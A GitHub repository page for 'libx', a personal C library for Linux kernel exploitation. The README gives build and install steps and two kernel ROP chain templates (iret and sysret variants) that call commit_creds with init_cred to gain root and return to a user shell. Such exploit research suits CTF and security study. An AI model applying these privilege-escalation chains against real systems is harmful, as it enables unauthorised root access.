Skip to content

n132/libx

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

145 Commits
.gdb_history
.gdb_history
 
 
.gitignore
.gitignore
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 
exp
exp
 
 
fuse.c
fuse.c
 
 
fuse.h
fuse.h
 
 
kaslr.c
kaslr.c
 
 
kaslr.h
kaslr.h
 
 
libx.c
libx.c
 
 
libx.h
libx.h
 
 
main.c
main.c
 
 
net.c
net.c
 
 
net.h
net.h
 
 

Repository files navigation

libx

It's a personal c language library for kernel exploits.

Dependencies

# If you use fuse
sudo apt install fuse libfuse-dev libkeyutils-dev

Usage

Install libx

git clone [email protected]:n132/libx.git
cd libx
make
make install # you may need sudo

uninstall libx

make clean
make uninstall

Example

//gcc main.c -o ./main -lx -w
#include <libx.h>
int main(){
    libxInit();
}

KROP

In kernel ROP, we usually return to user land by iret or sysret.

iret

    p[idx++]  = rdi;
    p[idx++]  = init_cred                   - NO_ASLR_BASE + base;
    p[idx++]  = commit_creds                - NO_ASLR_BASE + base;
    p[idx++]  = swapgs_restore_regs_and_return_to_usermode + 103 - NO_ASLR_BASE + base;
    p[idx++]  = *(size_t*) "RDI";
    p[idx++]  = *(size_t*) "RAX";
    p[idx++]  = shell;
    p[idx++]  = user_cs;
    p[idx++]  = user_rflags;
    p[idx++]  = user_sp|8;
    p[idx++]  = user_ss;

sysret

    p[idx++]  = rdi;
    p[idx++]  = init_cred                   - NO_ASLR_BASE + base;
    p[idx++]  = commit_creds                - NO_ASLR_BASE + base;
    p[idx++]  = r11;
    p[idx++]  = user_rflags;
    p[idx++]  = rcx;
    p[idx++]  = shell;
    p[idx++]  = sysret; // pop rsp; swapgs; sysret
    p[idx++]  = user_sp|8;

About

A Linux Kernel Exploitation C Library

Topics

linux-kernel pwn exploitation

Resources

Readme
Activity

Stars

5 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases 1

V1.0.0 Latest
Sep 26, 2024

Packages

No packages published

Languages